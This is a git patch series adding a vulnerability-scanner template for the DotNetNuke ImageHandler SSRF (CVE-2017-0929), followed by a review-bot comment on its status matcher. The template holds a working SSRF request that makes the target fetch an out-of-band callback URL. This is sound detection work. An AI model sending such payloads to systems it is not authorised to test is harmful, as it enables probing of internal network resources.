From 70c90bba845ac22c433af123a103561c2f91ba2c Mon Sep 17 00:00:00 2001
From: meme-lord <17912559+meme-lord@users.noreply.github.com>
Date: Wed, 27 Oct 2021 12:45:18 +0100
Subject: [PATCH 1/3] Added CVE-2017-0929 (DNN SSRF)
---
 cves/2017/CVE-2017-0929.yaml | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 cves/2017/CVE-2017-0929.yaml
diff --git a/cves/2017/CVE-2017-0929.yaml b/cves/2017/CVE-2017-0929.yaml
new file mode 100644
index 0000000000..ea6e1204e4
--- /dev/null
+++ b/cves/2017/CVE-2017-0929.yaml
@@ -0,0 +1,18 @@
+id: CVE-2017-0929
+info:
+ name: DotNetNuke ImageHandler SSRF (CVE-2017-0929)
+ severity: medium
+ reference:
+ - https://hackerone.com/reports/482634
+ author: CharanRayudu, meme-lord
+ tags: cve,cve2017,ssrf,dotnetnuke
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url={{interactsh-url}}'
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
From 46321e321c86bb36a2137b28f9c4f5d02235dae2 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Wed, 27 Oct 2021 12:05:42 +0000
Subject: [PATCH 2/3] Auto Generated CVE annotations [Wed Oct 27 12:05:42 UTC 2021] :robot:
---
 cves/2017/CVE-2017-0929.yaml | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)
diff --git a/cves/2017/CVE-2017-0929.yaml b/cves/2017/CVE-2017-0929.yaml
index ea6e1204e4..ebe7ad1e9c 100644
--- a/cves/2017/CVE-2017-0929.yaml
+++ b/cves/2017/CVE-2017-0929.yaml
@@ -1,11 +1,17 @@
 id: CVE-2017-0929
 info:
 name: DotNetNuke ImageHandler SSRF (CVE-2017-0929)
- severity: medium
+ severity: high
 reference:
 - https://hackerone.com/reports/482634
 author: CharanRayudu, meme-lord
 tags: cve,cve2017,ssrf,dotnetnuke
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2017-0929
+ cwe-id: CWE-918
+ description: "DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources."

 requests:
 - method: GET
From 4024822ddff966405147aeb80657b82459bc7f1c Mon Sep 17 00:00:00 2001
From: sandeep
Date: Fri, 29 Oct 2021 15:56:24 +0530
Subject: [PATCH 3/3] misc updates
---
 cves/2017/CVE-2017-0929.yaml | 20 ++++++++++++++------
 1 file changed, 14 insertions(+), 6 deletions(-)
diff --git a/cves/2017/CVE-2017-0929.yaml b/cves/2017/CVE-2017-0929.yaml
index ebe7ad1e9c..bd7c9bcac5 100644
--- a/cves/2017/CVE-2017-0929.yaml
+++ b/cves/2017/CVE-2017-0929.yaml
@@ -1,24 +1,32 @@
 id: CVE-2017-0929
+
 info:
- name: DotNetNuke ImageHandler SSRF (CVE-2017-0929)
+ name: DotNetNuke ImageHandler SSRF
+ author: charanrayudu,meme-lord
 severity: high
+ description: DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.
 reference:
 - https://hackerone.com/reports/482634
- author: CharanRayudu, meme-lord
- tags: cve,cve2017,ssrf,dotnetnuke
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-0929
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
 cvss-score: 7.50
 cve-id: CVE-2017-0929
 cwe-id: CWE-918
- description: "DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources."
+ tags: cve,cve2017,oast,ssrf,dnn

 requests:
 - method: GET
 path:
- - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url={{interactsh-url}}'
+ - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}'
+
+ matchers-condition: and
 matchers:
 - type: word
 part: interactsh_protocol
 words:
- - "dns"
+ - "http"
+
+ - type: status
+ status:
+ - 500
\ No newline at end of file
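Review bot: The new `matchers-condition: and` makes a finding depend on a `status: 500` response as well as the interactsh `http` callback, and nothing in the template records why a vulnerable host is expected to answer 500. If a reverse proxy or custom error page rewrites that status, a vulnerable DNN instance would be reported as clean, so I would add a comment above the status matcher such as `# TODO: document why a vulnerable DnnImageHandler is expected to return 500 here`, or drop the status matcher if that cannot be confirmed. An HTTP interaction on its own only shows that something fetched the URL, so a result is worth confirming by checking that the source address in the interaction log belongs to the scanned host. The file also ends without a trailing newline (`\ No newline at end of file`), which yamllint flags.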